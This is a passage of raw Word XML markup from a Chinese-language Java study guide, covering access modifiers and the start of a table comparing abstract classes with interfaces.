        <w:t>http://www.educity.cn/wenda/289578.html</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B42F93" w:rsidRPr="00F41A4C" w:rsidRDefault="00563FFB" w:rsidP="00B42F93">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00B42F93" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Java</w:t>
      </w:r>
      <w:r w:rsidR="00441A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问权限问题</w:t>
      </w:r>
      <w:r w:rsidR="00441A95" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B42F93" w:rsidRPr="00660E78" w:rsidRDefault="00A53BB8" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中默认权限为包权限。若是类声明为默认权限，则同一个包下的类都可以访问到该类，并可以实例化该类（当然如果这个类不具有实例化的能力除外，比如该类没有提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的构造函数）；</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>若是成员变量或成员方法声明为默认权限，则其是包级可见，同一个包内的类可以访问到这个属性或方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>权限有四个，分别为</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>public,protected,</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,private</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，其开放程度依次降低</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可供所有类访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只能类本身内部的方法可以访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r w:rsidRPr="00660E78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>继承可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001024AA" w:rsidRPr="001024AA" w:rsidRDefault="00563FFB" w:rsidP="001024AA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="00415333">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00415333">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口与抽象类</w:t>
      </w:r>
      <w:r w:rsidR="0089045A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6544" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="E8E8E8"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="54" w:type="dxa"/>
          <w:right w:w="54" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1901"/>
        <w:gridCol w:w="2586"/>
        <w:gridCol w:w="2057"/>
      </w:tblGrid>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>抽象类</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>默认的方法实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>它可以有默认的方法实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口完全是抽象的。它根本不存在方法的实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>子类使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>extends</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>关键字来继承抽象类。如果子类不是抽象类的话，它需要提供抽象类中所有声明的方法的实现。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>子类使用关键字</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>implements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>来实现接口。它需要提供接口中所有声明的方法的实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
